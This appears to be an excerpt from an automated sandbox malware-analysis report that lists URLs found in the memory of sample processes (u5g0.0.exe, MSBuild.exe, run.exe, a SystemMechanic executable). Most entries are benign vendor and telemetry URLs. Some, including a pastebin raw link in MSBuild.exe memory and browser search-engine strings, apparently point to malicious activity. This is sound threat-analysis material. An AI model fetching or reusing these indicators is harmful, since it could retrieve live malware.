Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/f
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.00000148020E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.avira.com/download/
Source: u5g0.3.exe, 00000005.00000003.2124589441.0000000002744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014582028.000001481B2F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811DEC000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014582028.000001481B2F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811DEC000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2928852683.0000014800455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3022320359.000001481EE32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2989251571.000001481ABD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5g0.0.exe, 00000001.00000003.1810768119.00000000231AD000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5g0.0.exe, 00000001.00000003.1810768119.00000000231AD000.00000004.00000020.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.00000148020E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u5g0.0.exe, 00000001.00000003.1814785643.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2928216488.0000000003768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2990751691.000001481AC30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/exee
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5g0.0.exe, 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5g0.0.exe, 00000001.00000003.1898737500.0000000029501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

